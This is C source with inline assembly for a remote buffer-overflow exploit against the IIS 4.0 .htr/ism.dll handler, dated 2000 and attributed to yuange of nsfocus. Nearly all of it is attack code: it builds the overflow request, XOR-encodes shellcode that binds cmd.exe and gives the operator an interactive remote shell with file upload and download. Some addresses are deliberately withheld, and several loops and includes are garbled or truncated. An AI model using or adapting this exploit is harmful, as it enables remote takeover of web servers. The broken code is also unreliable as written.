IIS4.0的.htr映射ism.dll溢出攻击程序
编写:yuange(yuange@nsfocus.com)
本程序实现所有语言版本WINDOWS下的溢出攻击。SHELLCODE代码实现绑定cmd.exe功能,实现上传下传文件的ftp功能,实现加密传输功能,不开端口、不开服务,可以绕过防火墙等。独创的实现源代码编写shellcode的办法,可以方便编写、修改、调试shellcode,使得编写强大功能的shellcode成为可能。也解决了溢出攻击的几个根本问题:
1、溢出点确定;2、shellcode定位; 3、jmp esp功能代码地址确定;4、WINDOWS的API调用地址版本相关问题。另一个版本实现了接管WWW功能,可以实现不修改WEB页面文件的情况下替换所有WEB页面。一般的溢出攻击程序也可以使用这个框架
程序在vc6.0下编译通过
iis4.0 overflow program ver 1.0
copy by yuange 2000.05.8
#include
#include
#include
#include
#define FNENDLONG 0x08
#define NOPCODE 'B' // INC EDX 0x90
#define NOPLONG 0x50
#define BUFFSIZE 0x20000
#define PATHLONG 0x12
// c:\inetpub\wwwroot 物理路径长度。
// 因为WWW处理GET /的时候前面要加物理路径,再传递给ISM.DLL处理,所以溢出点与物理路径有
// 关。可以先用.IDC,.ida,.idq泄露物理路径的办法得到物理路径长度
#define RETEIPADDRESS 0xxxxx-PATHLONG+4+4
#define ADD1 0xxxx-0xxxxx-PATHLONG+4
#define ADD2 0xxxxx-0xxxxx-PATHLONG+4
/* 由于一些原因,这儿数据不提供 2000.10.25 */
// 两个要处理的参数地址,参见后面ISM.DLL有问题代码的注释
#define SHELLBUFFSIZE 0x800
#define SHELLFNNUMS 12
#define DATAXORCODE 0xAA
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139
#define WEBPORT 80
void shellcodefnlock();
void shellcodefn(char *ecb);
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd
,int len);
void iisput(int fd,char *str);
void iisget(int fd,char *str);
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
int xordatabegin;
int lockintvar1,lockintvar2;
char lockcharvar;
int main(int argc, char **argv)
{
char *server;
char *str="LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"CreateFileA""\x0"
"GetFileSize""\x0"
"GetLastError""\x0"
"Sleep""\x0"
"cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
"XORDATA""\x0"
"strend";
char buff1[]="GET /""\xff""default.htr/";
char buff2[]=".HTR HTTP/1.1 \nHOST:";
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char SRLF[]="\x0d\x0a\x00\x00";
char eipexcept1[] ="\xxx\xxx\xxx\xxx";
// char eipexcept[] ="\xxx\xxx\xxx\xxx";
// ret
char eipexcept[]="\xxx\xxx\xxx\xxx";
char eipwinnt[] ="\xxx\xxx\xxx\xxx";
char eipwinnt2[]="\xxx\xxx\xxx\xxx";
char reteax[] ="\xxx\xxx\xxx\xxx";
由于一些原因,这儿数据不提供 2000.10.25
char eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64";
char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[0x1000];
struct sockaddr_in s_in2,s_in3;
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong;
int i,j,k;
unsigned char temp;
int fd;
u_short port,port1,shellcodeport;
SOCKET d_ip;
WSADATA wsaData;
int offset=0;
int OVERADD=RETEIPADDRESS;
int result;
fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2.");
fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net
.");
fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]);
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);
for(i=0;i if(recvbuff!=' ') break;
}
server=recvbuff;
if(i
fprintf(stderr,"\n please enter the offset(0-3):");
gets(buff);
for(i=0;i if(buff!=' ') break;
}
offset=atoi(buff+i);
}
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}
if(argc>2){
offset=atoi(argv[2]);
}
OVERADD+=offset;
/*
if(offset<0||offset>3){
fprintf(stderr,"\n offset error !offset 0 - 3 .");
gets(buff);
exit(1);
}
if(argc <2){
// WSACleanup( );
// exit(1);
}
else server = argv[1];
for(i=0;i if(server!=' ')
break;
}
if(i
for(i=0;i+3 if(server==':'){
if(server[i+1]=='\\'||server[i+1]=='/'){
if(server[i+2]=='\\'||server[i+2]=='/'){
server+=i;
server+=3;
break;
}
}
}
}
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
}
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
gets(buff);
exit(1);
}
else memcpy(&d_ip, he->h_addr, 4);
}
if(argc>3) port=atoi(argv[3]);
else port=WEBPORT;
if(port==0) port=WEBPORT;
fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port
%d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct
sockaddr_in))!=0) {
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n connect err.");
gets(buff);
exit(1);
}
_asm{
mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memset(buff,NOPCODE,BUFFSIZE);
if(argc>4){
memcpy(buff,argv[4],strlen(argv[4]));
}
else memcpy(buff,buff1,strlen(buff1));
memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x1000;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memcpy(shellcodebuff,shellcodefnadd,k);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);
sendpacketlong=k+i;
for(k=0;k<=0x200;++k){
if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
}
for(i=0;i temp=shellcodebuff;
temp^=DATAXORCODE;
if(temp<=0x10||temp=='
'||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){
buff[OVERADD+NOPLONG+k]='0';
++k;
temp+=0x40;
}
buff[OVERADD+NOPLONG+k]=temp;
++k;
}
// memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
// k+=sendpacketlong;
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+ADD1+offset+i,eipexcept,4);
memcpy(buff+ADD2+offset+i,eipexcept,4);
}
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+OVERADD+i,eipexcept,4);
}
memcpy(buff+OVERADD+i,eipwinnt2,4);
memcpy(buff+OVERADD+i+4,reteax,4);
memcpy(buff+OVERADD+i+8,eipwinnt,4);
memcpy(buff+OVERADD+i+0x0c,eipwinnt,4);
memcpy(buff+OVERADD+i+0x10,eipjmpshell,7);
// fprintf(stderr,"\n send:\n %s",buff);
fprintf(stderr,"\n offset:%d",offset);
if(argc>2){
server=argv[2];
if(strcmp(server,"win9x")==0){
memcpy(buff+OVERADD,eipwin9x,4);
fprintf(stderr,"\n nuke win9x.");
}
if(strcmp(server,"winnt")==0){
memcpy(buff+OVERADD,eipwinnt,4);
fprintf(stderr,"\n nuke winnt.");
}
}
sendpacketlong=k+OVERADD+NOPLONG;
strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);
strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");
// printf("\n send buff:\n%s",buff);
// strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);
#ifdef DEBUG
_asm{
lea esp,buff
add esp,OVERADD
ret
}
#endif
if(argc>6){
if(strcmp(argv[6],"debug")==0){
_asm{
lea esp,buff
add esp,OVERADD
ret
}
}
}
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr,"\n send packet %d bytes.",j);
send(fd,buff,j,0);
k=newrecv(fd,recvbuff,0x1000,0);
if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
xordatabegin=1;
k=-1;
fprintf(stderr,"\n ok!\n");
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n recv:\n %s",recvbuff);
}
}
k=1;
ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"\n now begin: \n");
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
k=1;
while(k!=0){
if(k<0){
i=0;
while(i==0){
gets(buff);
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
}
else{
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
}
else i=1;
}
}
k=strlen(buff);
memcpy(buff+k,SRLF,3);
newsend(fd,buff,k+2,0);
}
k=newrecv(fd,buff,0x1000,0);
if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){
xordatabegin=1;
k=-1;
}
if(k>0){
buff[k]=0;
fprintf(stderr,"%s",buff);
}
// if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
_emit('?')
xor ecx,ecx
add si,474h
cmp dword ptr [esi],ecx
jnz getesi
add si,4
getesi: mov esi,[esi]
add si,8
xor ecx,ecx
mov byte ptr [esi],cl
jmp next
getediadd: pop EDI
push EDI
pop ESI
push ebx // ecb
push ebx // call shellcodefn ret address
xor ecx,ecx
looplock: lodsb
cmp al,cl
jz shell
cmp al,0x30
jz clean0
sto: xor al,DATAXORCODE
stosb
jmp looplock
clean0: lodsb
sub al,0x40
jmp sto
next: call getediadd
shell: NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
(生如夏花之绚丽,死如秋叶之静美。)呵呵。。。。